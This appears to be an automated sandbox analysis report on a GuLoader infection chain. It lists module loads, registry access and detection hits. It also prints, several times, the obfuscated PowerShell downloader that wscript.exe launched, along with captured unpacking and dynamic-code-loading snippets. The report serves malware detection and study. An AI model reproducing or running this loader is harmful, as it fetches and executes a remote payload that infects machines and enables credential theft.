            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: actxprxy.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXiz source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbf` source: powershell.exe, 00000005.00000002.2595421485.0000000007B5E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: POWERSHELL "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatini", "0")
            Yara detected GuLoader
            Source: Yara matchFile source: 00000005.00000002.2603283847.000000000CA31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3346276290.0000000007441000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2591546419.00000000062C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2603130560.0000000008EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Lenet)$global:Scoffs = [System.Text.Encoding]::ASCII.GetString($Unionisters)$global:Superincumbent163=$Scoffs.substring(315073,27430)<#Retfrdighed Advokaturernes yondward Strafefterg
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Storhertug $buningens $Ideologic), (Hensattes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Paddy = [AppDomain]::CurrentDomain.GetAssemblies()$global:Cla
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Paramastitis)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kidders21, $false).DefineType($Hidfrtes, $Sl
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Lenet)$global:Scoffs = [System.Text.Encoding]::ASCII.GetString($Unionisters)$global:Superincumbent163=$Scoffs.substring(315073,27430)<#Retfrdighed Advokaturernes yondward Strafefterg
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivaelJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend 